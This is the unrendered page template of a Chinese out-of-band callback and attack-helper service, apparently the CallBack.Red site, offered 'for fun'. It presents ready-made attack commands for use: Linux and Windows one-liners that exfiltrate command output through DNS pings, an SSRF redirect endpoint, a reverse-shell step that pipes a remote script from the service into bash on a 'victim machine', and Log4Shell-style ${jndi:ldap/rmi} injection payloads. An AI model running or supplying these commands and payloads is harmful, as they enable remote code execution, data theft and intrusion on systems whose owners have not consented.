CallBack.Red 安全快速的Dns、Http、Rmi、Ldap Log平台 -- Hacking for fun!

Domain: {{domain}}

rmi: rmi://jndi.callback.red:5/{{domain.split(".")[0]}}/

ldap: ldap://jndi.callback.red:5/{{domain.split(".")[0]}}/

Key: {{key}}

获取域名中...

  

Results


LOG结果
# Type Record Ip req_body Time
{{ index }} {{ record.type }} {{ record.subdomain }} {{ record.ip }} {{ record.reqbody }} {{ record.time }}
dns 命令执行回显
Linux: CMD="这里填你的命令";RExSP="$(eval "$CMD"|hexdump -v -e '/1 "%02X"')";R=$(tr -dc 'a-z0-9' </dev/urandom | head -c 4 | sed 's/^[\n\r]*//g');i=0;for s in $(echo $RExSP|fold -w 63);do i=$((i+1));ping -c 1 "$s.$i.$R.cmd.{{domain}}">/dev/null;done

Windows: 这里填你的命令 1> execfile7 && certutil -encodehex -f execfile7 execfile7.txt 4 && (for /f "Delims=: Tokens=1-2" %a in ('findstr /n . execfile7.txt') do (for /f "Tokens=1-16" %c in ('echo %b')do ping -nc 1 %c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r.%a.%RANDOM%.cmd.{{domain}})) && del execfile7 && del execfile7.txt

时间:{{ record.time }}
{{ record.content }}
食用方法(反馈QQ群:727871590)
SSRF 302 redirect callback.red/ssrf/10.10.1.1/

=> $ curl callback.red/ssrf/10.10.1.1/
< HTTP/1.1 302 Found
< Server: nginx/1.20.1
< Date: Sun, 16 Jan 2022 15:41:36 GMT
< Content-Type: text/html;charset=utf-8
< Content-Length: 0
< Connection: keep-alive
< Cache-Control: must-revalidate, no-store
< Location: http://10.10.1.1/
反弹shell callback.red/sh4ll/ip:port

受害者机器:

=> $ curl callback.red/sh4ll/1.2.3.4:1234 | bash
or $ curl callback.red/sh4ll/1.2.3.4:1234 | sh

你的VPS:

=> $ nc -lvvp 1234
=> listening on [any] 1234 ...
connect to [1.2.3.4] from fbi.gov [127.0.0.1] 46958
RMI or LDAP 服务监听

rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/
ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/
路径后可以添加任何字符或留空 便于识别区分 如:
${jndi:ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/test}
${jndi:rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/hello}